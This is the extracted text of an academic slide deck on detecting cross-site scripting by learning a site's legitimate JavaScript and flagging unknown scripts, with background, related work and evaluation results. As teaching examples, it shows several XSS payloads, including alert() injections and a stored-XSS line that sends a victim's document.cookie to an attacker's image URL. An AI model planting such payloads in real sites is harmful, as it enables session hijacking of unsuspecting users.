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1 Detecting and filtering XSS using Positive Security Logic Ofer Rotberg David Movshovitz.

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1 1 Detecting and filtering XSS using Positive Security Logic Ofer Rotberg David Movshovitz

2 2 Web Application Architecture  Text Book  Real World

3 3 XSS Background  “Today, over 70% of attacks come at the ‘Application Layer’ not the network or system layer.” - Gartner Group  XSS is rated #1 among CVE (publicly reported vulnerabilities).  Very simple to perform  A plethora of freely available web applications.  Much of the code is alpha or beta, written by inexperienced programmers.  Every input has the potential to be an attack vector.  In order to (really) fix must change code.  [Source: Vulnerability Type Distributions in CVE Document version: 1.1 Date: May 22, 2007 (]

4 4 Some more interesting results… Source: “WhiteHat Website Security Statistic Reports”, Dec 2008 Become an hacker ?

5 The history repeats itself… 5 Source:

6 6 3 Types of XSS  Reflected (Non-Persistent): Script embedded in the request is ‘reflected’ in the response  Stored (Persistent): Attacker’s input is stored and played back in later page views  DOM Based (Local): the problem exists within a page's (legitimate) client-side script itself.

7 7 Reflected XSS RRequest h index.php?name=Jim RResponse <html> <body> Hello, Jim... RRequest h ex.php?name=Jim<script>aler t("XSS")</script> RResponse <html> <body> Hello, Jim <script>alert("XSS")</script>...  Browser – assumes server doesn’t send malicious content  Parse HTML – build DOM  Fetch resources and execute them.  Browser – assumes server doesn’t send malicious content  Parse HTML – build DOM  Fetch resources and execute them.

8 8 Stored XSS  Trudy posts the following text on a message board: Great message! var img=new Image(); img.src= " "+document.cookie;  When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy  virus. virus

9 9 DOM-Based XSS  First published by Amit Klein (  http://victim/promo?product_id=100&title=Last+Chance  http://victim/promo?product_id=100&title=Foo# alert('XSS') var url = window.location.href; var pos = url.indexOf("title=") + 6; var len = url.length; var title_string = url.substring(pos,len); document.write(title_string); var url = window.location.href; var pos = url.indexOf("title=") + 6; var len = url.length; var title_string = url.substring(pos,len); document.write(title_string); DEMO

10 10 DOM XSS DEMO >!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> var visitor_name = prompt("What is your name?“,"") document.write("Welcome " + visitor_name + " How are you?");

11 11 Current Approaches for (Web) Application Security  Source-code analyzers (white box)  Static –  Run simple text-based searches for strings (e.g. strcpy).  Dynamic  construct all possible runtime functional call stacks.  attempt to determine if a call (to strcpy, for example) can be reached by data received as an input from the user or the environment.  Pro’s  Operate on source code, thus can be used by developers.  Integrate tightly into the development phase.  Pinpoint the problems – where to fix.  Con’s  Developers must understand security.  Language specific.

12 12 Current Approaches for (Web) Application Security (cont.)  Web application scanners (black box)  Fully automated or manual  …see David’s slides. х Automated Login х Infinite web sites х How does the scanner know if logout has occurred ? х multi-page business processes utilizing HTML forms. х Web applications are constantly changing.

13 13 Current Approaches for (Web) Application Security (cont.)  Web Application Firewalls (WAF)  Often called “deep packet inspection firewalls”.  Examine every request/response within the HTTP, SOAP, XML-RPC, and Web service layers.  Focus on request  Stored XSS is a problem.  Filtering approaches:  Misuse based (Negative model)  novel attacks ?  false positives - if the system configuration or environment changes  false negative – if using negative model  Large deviations from one web application to another (signature per application).  Anomaly based  Model “normal” traffic and find statistical deviations.  False Positive rate.  Unproven theory.  Training set might include attacks.

14 14 HTTP Vs. Network anomaly detection  The stateless nature of HTTP  most existing attacks are only one request long.  In network level attacks, an attacker might check if a vulnerability is likely to exist before attempting to exploit it.  the non-stationary nature of web servers  web site content changes rapidly.  Changes in content imply changes in the HTTP requests  HTTP requests are variable length  Any learning algorithm that requires fixed-length input, such as a neural net, will not work.  Training data for anomaly detection is unbalanced  Many algorithms require similar amounts of normal and abnormal data  These problems eliminate many algorithms that have been successful before

15 15 (Simple) Mitigation Techniques  Disable JS (…and also, Flash, ActiveX, Java Applets…)  Web 2.0 is based on AJAX.  Netscape SOP  Browser isn’t allowed to load or send JS if it doesn’t belong to the same domain.  …can be easily bypassed (<IMG src =…)  What about mashup ? reuse of code ? external resources ?

16 16 (Simple) Mitigation Techniques (cont.)  Encode\Escape user input (in request/response)  encode all user-supplied HTML special characters, thereby preventing them from being interpreted as HTML.  But…many modern web application permit HTML input.  MS.NET Anti-XSS library, OWASP PHP Anti-XSS library.

17 17 (Simple) Mitigation Techniques (cont.)  Input validation  Positive security model.  check all input for length, type, syntax, and business rules before accepting the data to be displayed or stored.  Protect agains cookie stealing  Tie cookie to IP  HTTP-Only cookie - cookie is unavailable to JS.

18 18 The filtering problem  Remove all tags from input  There are many different Ways to execute Scripts in an HTML Page (XSS cheatsheet)   <div id="mycode" expr="alert('hah!')"   Input validation  there are many different ways to represent the same character in HTML.  Browsers tend to be “forgiving” XSS Cheat Sheet

19 19 The filtering problem (cont.)

20 20 Tricky Scripts  JS permits invoking code within code using eval()  eval("x=10;y=20;document.write(x*y)")  temp=eval("document.myForm." + fieldList[i]);  eval(xmlhttp.responseText);  JS writes new HTML elements with new JS .innerHTML, document.write()

21 21 Related Work  Client-side solutions  Engin Kirda, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic “Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks” (2006)  A client-side web proxy that analyzes all internal and external links embedded in Web pages.  Noxes will identify an unrecognized external link as an XSS attack.  Noxes only focuses on the XSS attacks targeted on stealing credentials.

22 22 Related Work (cont.)  Query anomaly analysis  Christopher Krugel, G.Vigna, William Robertson, “A multimodal approach to the detection of web based attacks,”(2005)  DFA  Ingham, Somayaji, Burge and Forrest: “ Learning DFA representations of HTTP for protecting web applications” (2006)

23 23 Related Work (cont.)  Web response analysis  Bisht and Venkatakrishnan “XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks” (July 2008).

24 24 XSS-Guard example

25 25 Related Work (cont.)  Johns, Engelmann and Posegga, ”XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008).  Reflected –  Given a set of parameters P = {p 1, p 2,..., p m } and a set of scripts S = {s 1, s 2,..., s n } find all matches between P and S in which p i was used to define parts of s j.  Stored –  Static scripts – simple.  Dynamic scripts  Normalize constants (Strings, Numbers and RegEx)  varying code blocks – variant  script

26 26 Related Work (cont.)  Johns, Engelmann and Posegga, ”XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008).  results

27 27 Proposed Model  Positive security logic.  All traffic is illegal unless known to be legal  HTML Response = collection of JavaScript nodes.

28 28 Model Benefits  Performance – “light” JS parsing.  Generic - targets all types of XSS  Even DOM-Based could be mitigated if web proxy is deployed on client side.  Fast convergence – short learning period  Number of JS nodes is bounded.  Most JS nodes appear in every page (“building blocks”).  JS nodes DB is transportable  Distributed learning.  Can detect some attacks even if JS didn’t run.

29 29 Implementation  Learn web sites:  Crawl web-site using websphinx (  Produce static pages and dynamic pages using random fuzzer  JavaScript extraction.  Now –using HTMLParser (  Future - Hook to Mozilla JS extraction engine ?  JavaScript code normalization.  Using Java RegEx

30 Challenges  Attack is browser specific.  Handle special instructions ( e.g.: eval() ).  Attacks against the model  Document.write(“…”);  Performance 30

31 31 Current Results - False Positive Rate  False Positive Rate ≡  (# learned URL’s with new scripts)/(#URLs in detection phase)  Test methodology  Crawl web-site  create URL’s pool (~150 URL’s)  Generate random query URL’s using fuzzer.  Learn % of total URL’s (randomly picked)  Detect % of total URL’s (randomly picked)  Ignore “attacks” from unlearned URL’s

32 32 URL FP Rate w/o Normalization

33 33 Script FP Rate w/o Normalization

34 34 Current Results - False Negative Rate  False Negative Rate ≡  (# Attacks Detected)/(#Attacks Injected)  Test methodology  Find a real vulnerable web-application ( )  Create a pool of legitimate URLs using benign fuzzer.  Create a pool of attack URLs using XSS cheat sheet payloads.  Learn script DB.  Detect attacks.

35 FN Results

36 36 Deployment Options

37 37 Further Work  Efficient implementation to increase performance  Code clone detection  Future Applications  Application JS profile  JS cache  Deployment options  ISP, Enterprise, Client.  Other fields:  JS worms propagation.  Mash-Up.  AJAX security.

38 38 Thank You !

39 39 Some More Related Work  Vulnerability analysis: find vulnerable source-sink pairs e.g., saner: Livshits et al. Usenix 2005, Pixy N. Jovanovic et al. S&P2006, Y. Xie et al. Usenix 2006, D. Balzarotti et al. CCS 2007...  Useful but limited to detection  Server side solutions: filter based or track taint & disallow at sink : W. Xu et al. Usenix 2006, …  Centralized defense but do not know all scripts  Client side solutions: Firewall like mechanisms to prevent malicious actions at client  Noxes E. Kirda, et al. SAC 2006, P. Vogt et al. NDSS 2007  User controlled protection but do not know intended scripts  Client-Server collaborative solutions: Clients enforce application specified policies  BEEP T. Jim, et al. WWW 2007, Tahoma R. Cox et al. S&P 2006, Browsershield C. Reis et al. OSDI 2006  Can determine intended and all scripts but deployment issues 39

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